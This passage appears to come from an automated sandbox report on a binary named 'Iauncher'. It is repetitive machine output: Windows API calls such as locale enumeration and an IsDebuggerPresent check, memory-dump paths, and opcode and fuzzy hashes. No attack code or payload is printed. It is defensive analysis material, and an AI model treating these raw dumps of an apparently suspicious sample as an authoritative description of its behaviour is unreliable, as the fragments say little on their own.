                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3906539128-0
                                                                                                                                                    • Opcode ID: 5d723c5fe6f29d7ccd8f30df69bf1545deea9131acc1537fa6f80d00c9516ee0
                                                                                                                                                    • Instruction ID: 1bbaaf84f9e6ea54bc001f6d8e51a6e9c982dc7ab7b2cc02f2367f985bb33824
                                                                                                                                                    • Opcode Fuzzy Hash: 5d723c5fe6f29d7ccd8f30df69bf1545deea9131acc1537fa6f80d00c9516ee0
                                                                                                                                                    • Instruction Fuzzy Hash: 4C31E574901219DBCB21DF64DD89B8DBBB8BF18310F5041DAE81CA7250EB709F858F45
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,0057232C,?,20001004,00000000,00000002,?,?,0057192E), ref: 00575D4D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                    • String ID: SV
                                                                                                                                                    • API String ID: 2299586839-4155469514
                                                                                                                                                    • Opcode ID: 068e087007f3c5e3ed925e6048bf55eaa548150617d373ec6391f98cc2f4e2b7
                                                                                                                                                    • Instruction ID: 85cc21ce301904e7d2c555033ea1da52a0a4d1991acdadadfd8f464cd2ef2c49
                                                                                                                                                    • Opcode Fuzzy Hash: 068e087007f3c5e3ed925e6048bf55eaa548150617d373ec6391f98cc2f4e2b7
                                                                                                                                                    • Instruction Fuzzy Hash: 64E01A3190051EFBCB222F61EC09A9E7E59BF44760F008410FD096A121DBB28A21BB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00566892
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FeaturePresentProcessor
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2325560087-0
                                                                                                                                                    • Opcode ID: 2b69fa81a0c7f66ef0ed10ec54c3310be696c1c8075397189169cc501cc54fae
                                                                                                                                                    • Instruction ID: f2392574b0a73ff002f3564f5720f60a718fc33f96cd2ab093c42c7ba31f88b5
                                                                                                                                                    • Opcode Fuzzy Hash: 2b69fa81a0c7f66ef0ed10ec54c3310be696c1c8075397189169cc501cc54fae
                                                                                                                                                    • Instruction Fuzzy Hash: CB516EB5A01605CFEB14CFA5DE867AABBF0FB58310F249A2AD806FB250D3749944CB50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 9c6298528acc933368cf2696c7689d3e043873af8187f28fa81416800618a55f
                                                                                                                                                    • Instruction ID: bca909097aee6ed6b8d12ed724230b2455a3124ac73534f3efb8c7e7b45bd9fe
                                                                                                                                                    • Opcode Fuzzy Hash: 9c6298528acc933368cf2696c7689d3e043873af8187f28fa81416800618a55f
                                                                                                                                                    • Instruction Fuzzy Hash: C141C675804219AEDF10DF69DC89AEABBB8FF45304F1482D9E40CD3201DA309E849F60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 005730E0: GetLastError.KERNEL32(?,00000008,00578F07,00000000,0056AC50), ref: 005730E4
                                                                                                                                                      • Part of subcall function 005730E0: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 00573186
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0057C87C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$InfoLocale
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3736152602-0
                                                                                                                                                    • Opcode ID: 72b47690ac47f0c615679bfba19f289179beced699958c450bd8e0c748fe4a78
                                                                                                                                                    • Instruction ID: bdbfbd9284b9c8a5da2b1b156c74ef89a8b3ea5bb29daf95a399434e55b94556
                                                                                                                                                    • Opcode Fuzzy Hash: 72b47690ac47f0c615679bfba19f289179beced699958c450bd8e0c748fe4a78
                                                                                                                                                    • Instruction Fuzzy Hash: 4821B372610207ABDB28AA29EC46B7A3FA8FF45314B10807EFD09D6141EB75ED04AB51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 005730E0: GetLastError.KERNEL32(?,00000008,00578F07,00000000,0056AC50), ref: 005730E4
                                                                                                                                                      • Part of subcall function 005730E0: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 00573186
                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(0057C5D5,00000001,00000000,?,-00000050,?,0057CC06,00000000,?,?,?,00000055,?), ref: 0057C521
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2417226690-0
                                                                                                                                                    • Opcode ID: f42be8ceef2a727bc2ac0d56e11a75489de5c2e137ea25512d801583169e2b2d
                                                                                                                                                    • Instruction ID: 5372ab725dee6ca8230e708a59a02b65ad6ddae5d6c1620339992f8bb3de777c
                                                                                                                                                    • Opcode Fuzzy Hash: f42be8ceef2a727bc2ac0d56e11a75489de5c2e137ea25512d801583169e2b2d
                                                                                                                                                    • Instruction Fuzzy Hash: AB114C3B2007015FDF189F39D8A567ABF92FF84368B15842DE94A87740E772B942E740
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 005730E0: GetLastError.KERNEL32(?,00000008,00578F07,00000000,0056AC50), ref: 005730E4
                                                                                                                                                      • Part of subcall function 005730E0: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 00573186
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0057C7F1,00000000,00000000,?), ref: 0057CA83
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$InfoLocale
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3736152602-0
                                                                                                                                                    • Opcode ID: 81d07019da6091c94af48a63f80765b8406a87b5e9021e7f18c8aa4391156c57
                                                                                                                                                    • Instruction ID: 2c2869037a13b555310fa901d0cc0cb332e77b9b19f6d551b42eff2e076876af
                                                                                                                                                    • Opcode Fuzzy Hash: 81d07019da6091c94af48a63f80765b8406a87b5e9021e7f18c8aa4391156c57
                                                                                                                                                    • Instruction Fuzzy Hash: B1F0F93660011BAFDB24DA21DC09BBA7F54FB40355F08C42DED0AA3140DA74FE41E6D0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 005730E0: GetLastError.KERNEL32(?,00000008,00578F07,00000000,0056AC50), ref: 005730E4
                                                                                                                                                      • Part of subcall function 005730E0: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 00573186
                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(0057C828,00000001,?,?,-00000050,?,0057CBCA,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 0057C594
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2417226690-0
                                                                                                                                                    • Opcode ID: 92fdf5cca61602885590bd2e30b25bae7f4f4958cb1013ce86fbca4b84421a89
                                                                                                                                                    • Instruction ID: 9d1fbf954766f4a6f86d7e5b035e370bad8d1ec18bed8ca151a39b76fddc8bfc
                                                                                                                                                    • Opcode Fuzzy Hash: 92fdf5cca61602885590bd2e30b25bae7f4f4958cb1013ce86fbca4b84421a89
                                                                                                                                                    • Instruction Fuzzy Hash: 5CF0C2362003055FDB14AF35A885A7A7F91FF80768B05842CF90A8B680C672AD41EB50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0056D9E4: EnterCriticalSection.KERNEL32(?,?,00572DB8,?,0058D418,00000008,00572F7C,?,?,?), ref: 0056D9F3
                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(005757E6,00000001,0058D4D8,0000000C,00575C15,00000000), ref: 0057582B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1272433827-0
                                                                                                                                                    • Opcode ID: f2ba3d667ce9ab3bca0dcd2f83cefca7d628963b2c844201a06cebcb032490a2
                                                                                                                                                    • Instruction ID: 6afeff4df4a86502221ccb2d7f4592d387deb8702fc4a6b9c12dc56f5b035a99
                                                                                                                                                    • Opcode Fuzzy Hash: f2ba3d667ce9ab3bca0dcd2f83cefca7d628963b2c844201a06cebcb032490a2
                                                                                                                                                    • Instruction Fuzzy Hash: 32F03C72A54205DFD700EF98E846B597BF0FB48724F10852AE814AB2A0DBB55908DF50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 005730E0: GetLastError.KERNEL32(?,00000008,00578F07,00000000,0056AC50), ref: 005730E4
                                                                                                                                                      • Part of subcall function 005730E0: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 00573186
                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(0057C3BD,00000001,?,?,?,0057CC28,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0057C49B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2417226690-0
                                                                                                                                                    • Opcode ID: 7edb0e207c03800951fb08cbd9c05101c7f90be79477ea0ff755cdca1fec25f0
                                                                                                                                                    • Instruction ID: e4531bde26c40b538910c803cffc8cee51cbf3916ca2e21890362e284426a05e
                                                                                                                                                    • Opcode Fuzzy Hash: 7edb0e207c03800951fb08cbd9c05101c7f90be79477ea0ff755cdca1fec25f0
                                                                                                                                                    • Instruction Fuzzy Hash: E5F0E53A30020557CF04AF35E859B7A7F95FFC1761B06805DEE0E8B250C6769946E790
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00006F07,00566457), ref: 00566F00
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                    • Opcode ID: 753a567ffa044d17f2da0f607f4a6930c133e0706efa7dbe48a3fd88a7cb4e81
                                                                                                                                                    • Instruction ID: 32efa583d39b9aace6f665e7e0b15781f81c3f61e4c54e05134ecec805f1cd1c
                                                                                                                                                    • Opcode Fuzzy Hash: 753a567ffa044d17f2da0f607f4a6930c133e0706efa7dbe48a3fd88a7cb4e81
                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HeapProcess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 54951025-0
                                                                                                                                                    • Opcode ID: f0ef559ca1cc485a2036a1f3e7d4e17ee5cd407f287895692aa3a68ad72fb163
                                                                                                                                                    • Instruction ID: 20be810ecd7c1aa230dbc6ed0c4cf59a57eba29a7f66ad7333743407fca9dcda
                                                                                                                                                    • Opcode Fuzzy Hash: f0ef559ca1cc485a2036a1f3e7d4e17ee5cd407f287895692aa3a68ad72fb163
                                                                                                                                                    • Instruction Fuzzy Hash: 55A011302022028BC3008F30AB0820C3AE8AA2E2823002028AC08E0022EA3080A8AB00
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • type_info::operator==.LIBVCRUNTIME ref: 00569B07
                                                                                                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 00569C15
                                                                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 00569D67
                                                                                                                                                    • CallUnexpected.LIBVCRUNTIME ref: 00569D82
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                                    • API String ID: 2751267872-393685449
                                                                                                                                                    • Opcode ID: f343dae1b7556bcf89fc156e157fec80a2fc9f25ce05b3827c1e43ffef68e9e2
                                                                                                                                                    • Instruction ID: 30890b52ec2d58f718d0f380d99175ff65706d1ac385b42e4df3eb3f1d44e16d
                                                                                                                                                    • Opcode Fuzzy Hash: f343dae1b7556bcf89fc156e157fec80a2fc9f25ce05b3827c1e43ffef68e9e2
                                                                                                                                                    • Instruction Fuzzy Hash: 62B1667180020AEFCF29DFA4D9859AEBFB9FF94310F14416AE8056B212D735DE51CB92
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 005694B7
                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 005694BF
                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00569548
                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00569573
                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 005695C8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                    • String ID: csm$SV
                                                                                                                                                    • API String ID: 1170836740-1636546819
                                                                                                                                                    • Opcode ID: 8a6cf238046ec857455d11c8359e1acd5237afb871821c75e4d8f62e076333f0
                                                                                                                                                    • Instruction ID: 88d7df2940f7a51848ecc1040d5940a0c3581bb5f085fb923e00cd5dc141d4b3
